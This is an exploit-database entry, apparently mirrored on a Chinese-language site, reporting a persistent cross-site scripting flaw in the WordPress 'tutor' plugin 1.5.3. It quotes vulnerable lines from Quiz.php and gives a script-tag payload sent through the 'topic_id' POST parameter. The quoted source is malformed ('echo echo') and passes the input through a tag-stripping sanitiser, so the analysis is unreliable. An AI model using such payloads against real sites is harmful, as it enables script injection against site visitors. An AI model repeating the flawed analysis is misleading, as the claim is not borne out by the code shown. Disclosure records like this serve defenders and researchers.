WordPress Plugin tutor.1.5.3 – Persistent Cross-Site Scripting

  • 作者: Mehran Feizi
    日期: 2020-02-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48059/
  • #Tile: WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
    #Author: mehran feizi
    #Category: webapps
    #Date: 2020-02-12
    #vendor home page: https://wordpress.org/plugins/tutor/
    
    ===================================================================
    Vulnerable page:
    /Quiz.php
    ===================================================================
    Vulnerable Source:
    473: echo echo $topic_id; 
    447: $topic_id = sanitize_text_field($_POST['topic_id']); 
    ===================================================================
    Exploit:
    localhost/wp-content/plugins/tutor/classes/Quiz.php
    $_POST('topic_id') = <script>alert('mehran')</script>
    =================================================================================